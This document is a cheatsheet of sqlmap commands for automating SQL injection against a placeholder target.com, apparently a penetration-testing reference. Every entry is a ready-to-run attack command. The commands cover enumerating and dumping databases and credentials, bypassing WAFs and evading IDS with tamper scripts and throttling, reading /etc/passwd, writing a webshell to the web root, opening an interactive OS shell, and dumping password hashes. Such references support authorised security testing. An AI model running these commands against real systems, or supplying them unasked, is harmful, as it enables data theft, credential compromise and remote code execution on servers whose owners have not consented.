SQLMap — SQL Injection Automation — Cheatsheet

Basic Detection (6)

sqlmap -u "http://target.com/page?id=1"

Test GET parameter for SQLi

basic detection

sqlmap -u "http://target.com/page?id=1" --dbs

Enumerate databases

enum databases

sqlmap -u "http://target.com/page?id=1" -D dbname --tables

List tables in a database

enum tables

sqlmap -u "http://target.com/page?id=1" -D dbname -T users --columns

List columns in a table

enum columns

sqlmap -u "http://target.com/page?id=1" -D dbname -T users -C username,password --dump

Dump specific columns

dump credentials

sqlmap -u "http://target.com/page?id=1" --dump-all

Dump all databases

dump all

POST Requests & Forms (4)

sqlmap -u "http://target.com/login" --data="username=admin&password=pass"

Test POST parameters

post form

sqlmap -r request.txt

Test from saved Burp request file

burp request

sqlmap -u "http://target.com/login" --data="user=admin&pass=test" -p user

Test specific POST parameter

post param

sqlmap -u "http://target.com/page" --cookie="PHPSESSID=abc123" --data="id=1"

POST with authentication cookie

post auth cookie

Authentication & Session (3)

sqlmap -u "http://target.com/page?id=1" --cookie="session=TOKEN"

Inject with session cookie

auth cookie

sqlmap -u "http://target.com/page?id=1" -H "Authorization: Bearer TOKEN"

Inject with Bearer token

auth header

sqlmap -u "http://target.com/page?id=1" --auth-type=Basic --auth-cred="admin:password"

HTTP Basic authentication

auth basic

Techniques & Evasion (8)

sqlmap -u "http://target.com/page?id=1" --technique=BEUST

All techniques: Boolean, Error, Union, Stacked, Time

technique

sqlmap -u "http://target.com/page?id=1" --technique=T --time-sec=5

Time-based blind only

blind time

sqlmap -u "http://target.com/page?id=1" --tamper=space2comment

Use tamper script for WAF bypass

waf bypass tamper

sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase,space2comment

Chain multiple tamper scripts

waf bypass

sqlmap -u "http://target.com/page?id=1" --random-agent

Random User-Agent to avoid detection

evasion useragent

sqlmap -u "http://target.com/page?id=1" --delay=1 --safe-freq=3

Slow down requests (IDS evasion)

evasion slow

sqlmap -u "http://target.com/page?id=1" --proxy=http://127.0.0.1:8080

Route through Burp proxy

proxy burp

sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3

Max level & risk (most aggressive)

aggressive

OS & Privilege Escalation (7)

sqlmap -u "http://target.com/page?id=1" --current-user --current-db --hostname

Get current DB user, database, hostname

info enum

sqlmap -u "http://target.com/page?id=1" --is-dba

Check if current user is DBA

priv dba

sqlmap -u "http://target.com/page?id=1" --file-read=/etc/passwd

Read local file (MySQL FILE priv)

fileread lfi

sqlmap -u "http://target.com/page?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php

Write webshell to server

rce shell upload

sqlmap -u "http://target.com/page?id=1" --os-shell

Interactive OS shell via SQLi

rce shell

sqlmap -u "http://target.com/page?id=1" --os-cmd="whoami"

Execute single OS command

rce cmd

sqlmap -u "http://target.com/page?id=1" --passwords

Dump DB user password hashes

passwords hashes